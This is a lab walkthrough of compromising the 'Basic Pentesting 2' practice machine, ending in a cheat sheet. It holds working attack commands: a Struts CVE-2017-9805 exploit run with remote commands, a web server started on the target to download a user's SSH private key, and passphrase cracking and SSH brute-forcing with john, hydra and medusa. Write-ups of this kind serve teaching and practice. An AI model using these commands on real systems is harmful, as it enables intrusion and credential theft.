Setup
Our attacking box is a virtual machine that has the IP 192.168.56.102 and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 2, a vulnerable virtual machine to practice penetration testing. It has the IP 192.168.56.101 and we have no further information about this target.
Information Gathering
We start by running nmap on the target IP.
nmap -sV -Pn -n 192.168.56.101
We have the following open ports to investigate:
- SSH server (OpenSSH 7.2p2 on port 22)
- webserver (Apache 2.4.18 on port 80)
- Samba (smbd 3.X-4.X on ports 139 and 445)
- Apache Jserv (1.3 on port 8009)
- Apache Tomcat (9.0.7 on port 8080)
Let’s check out the webserver first by opening 192.168.56.101:80 in the browser.
Next, we run nikto to get some more information.
nikto -h 192.168.56.101
Once again, we discover an interesting director called /development/ and we open it in a browser.
The directory contains two .txt files that we also open.
It seems like there are at least two users with the initials “J” and “K”. Furthermore “K” seems to be an admin and “J” seems to use a weak password. That’s good to know. Apart from the Apache and SMB servers that we already know about, “K” mentions a struts 2.5.12 REST example. A quick Google search suggests that the default location for that example code is http://192.168.56.101:8080/struts2-rest-showcase-2.5.12.
It seems like the struts2 test is still running. A bit of googling (“struts 2.5.12 cve”) reveals that version 2.5.12 is exploitable with code execution as indicated by CVE-2017-9805 [1].
Exploitation
We find a Python script to exploit the vulnerability by googling “CVE-2017-9805 exploit github” [2] and copy and paste the struts-pwn.py script into a file on our attack box. To test if everything works, we’ll send a ping command to our attack box through the exploit and check for incoming icmp packages with tcpdump on our attack box.
sudo tcpdump -n icmp
python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "ping -c2 192.168.56.102" --exploit
As we can see, the ping is sent from the target machine to our attack box.
At this point we reach a temporary dead end because we tried to run a couple of reverse shells and none worked. It seems like you cannot run any commands with ; or &&. After a while we realized that we could try to run a server and connect to it. Running the default Python 2 webserver on port 9090 on the target machine worked.
python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "python -m SimpleHTTPServer 9090" --exploit
After connecting to 192.168.56.101:9090 with a browser, we get a nice directory listing of the filesystem that we can explore.
Post Exploitation
After entering the /home directory, we see that the usernames of “J” and “K” are jan and kay respectively. Our initial thought is to grab /etc/shadow and decrypt jan’s supposedly weak password. However, we only get a 404 when we try to access the file. However, there are a lot of interesting things in kay’s home directory.
Unfortunately, pass.bak, which could be a backup file for the password, cannot be accessed. However, the .ssh directory can be entered and contains a private key (id_rsa) that we can download.
curl http://192.168.56.101:9090/home/kay/.ssh/id_rsa > id_rsa
We also note that kay can login as admin, as indicated by the existence of the .sudo_as_admin_successful file.
If we try to login with the obtained key, we get a warning about the persmissions of the key file so we change that first and then connect via ssh.
chmod 600 id_rsa
ssh -i id_rsa kay@192.168.56.101
Unfortunately, ssh asks for a passphrase. We can use john to crack the passphrase but we first have to convert it to a suitable format with ssh2john.py. We will also use a wordlist of common passwords that were exposed after an attack on RockYou [3]. The wordlist comes preinstalled with Kali but we have to unzip it first.
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
With the passphrase we ssh into the target machine and immediately try to become root. Unfortunately, we still need kay’s password. Thankfully, we remember the file pass.bak that we couldn’t access before. Sure enough, it contains the correct password and we become root. Mission accomplished 🙂
Alternative Attacks
ssh cracking
Since smbd is running on the target, we can use enum4linux to get some information about local users of the system.
enum4linux -r 192.168.56.101
We can see that there are two local users named “kay” and “jan” on the system. We remember from before, that the user “jan” supposedly has a weak password in /etc/shadow. From this, we deduce that he will probably use weak passwords everywhere and try to crack his ssh password with medusa.
medusa -h 192.168.56.101 -f -g 5 -u 'jan' -P /usr/share/wordlists/rockyou.txt -M ssh
Alternatively, we can use hydra, which was a bit faster than medusa.
hydra -l 'jan' -P /usr/share/wordlists/rockyou.txt 192.168.56.101 ssh
The scans reveal the password “armando” which we use to ssh to the target machine.
Unfortunately, we are not allowed to sudo so we have to find another way to escalate our privileges on this machine. Poking around a bit, we see that we can cd into the home directory of kay. From there, we can cd into his .ssh directory and cat id_rsa and repeat the steps from our initial attack to gain root access.
smbd
To get more information about smbd, we scan the smbd ports (139,445) again but this time, we also use nmap’s script scan (-sC) feature.
sudo nmap -sV -sC -Pn -n -p 139,445 192.168.56.101
It seems like the smbd version is 4.3.11. We can also use nmap to enumerate smb shares.
nmap -sV --script=smb-enum-shares -p 445 192.168.56.101
…and nmblookup to lookup NetBIOS names.
nmblookup -A 192.168.56.101
We can see that there’s an account named guest. We try to connect without a password.
smbclient -W 'WORKGROUP' //'192.168.56.101'/Anonymous -U''%''
Let’s see if the smbd is vulnerable by googling “smbd 4.3.11 cvs” which yields a whopping 21 vulnerabilities [4]. The most promising is CVE-2017-7494, also known as SambaCry [5]. Unfortunately, it seems like we are not allowed to write to the share (even though nmap previously reported we have READ/WRITE access), which is a prerequisite for the exploit [6].
We can confirm this with smbmap.
This concludes our further tests.
Lessons Learned
Information gathering
Always check out the contents of all non-standard files that you can read. There might be some interesting information (like development and testing environments or notes about password security).
Username enumeration if samba is running:
enum4linux -r TARGET-IP
Exploitation
Listen for incoming ping
Useing tcpdump to listen for a ping is a good way of checking remote code execution. Just run ping -c2 ATTACK-IP from the target box.
sudo tcpdump -n icmp
Run a webserver on the target machine
python -m SimpleHTTPServer PORT
Cracking ssh passwords
medusa -h TARGET-IP -f -g 5 -u 'USERNAME' -P /usr/share/wordlists/rockyou.txt -M ssh
hydra -l 'USERNAME' -P /usr/share/wordlists/rockyou.txt TARGET-IP ssh
Samba
Get information about samba on the target:
sudo nmap -sV -sC -Pn -n -p 139,445 TARGET-IP
nmap --script=smb-enum-shares -p 445 TARGET-IP
nmblookup -A TARGET-IP
Check access rights and list files:
smbmap -R -H TARGET-IP
Connect to a samba share. The argument passed via -U is username%password. If left empty, an annonymous login is tried.
smbclient -W 'WORKGROUP' //'192.168.56.101'/SHARENAME -U ''%''
Post Exploitation
ssh
Always check the home directories for interesting content. SSH keys are especially useful if ssh is running on the target. Get id_rsa either by copy&pasting it or by getting it through a webserver we started.
curl http://IP:PORT/home/USERNAME/.ssh/id_rsa > id_rsa
Connect via ssh with a keyfile:
chmod 600 id_rsa
ssh -i id_rsa USERNAME@TARGET-IP
Cracking ssh pass phrases (RockYou wordlist):
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
Misc
A .sudo_as_admin_successful file indicates, that this user can become root.
Sources
[1] https://www.cvedetails.com/cve/CVE-2017-9805/
[2] https://github.com/mazen160/struts-pwn_CVE-2017-9805
[3] https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords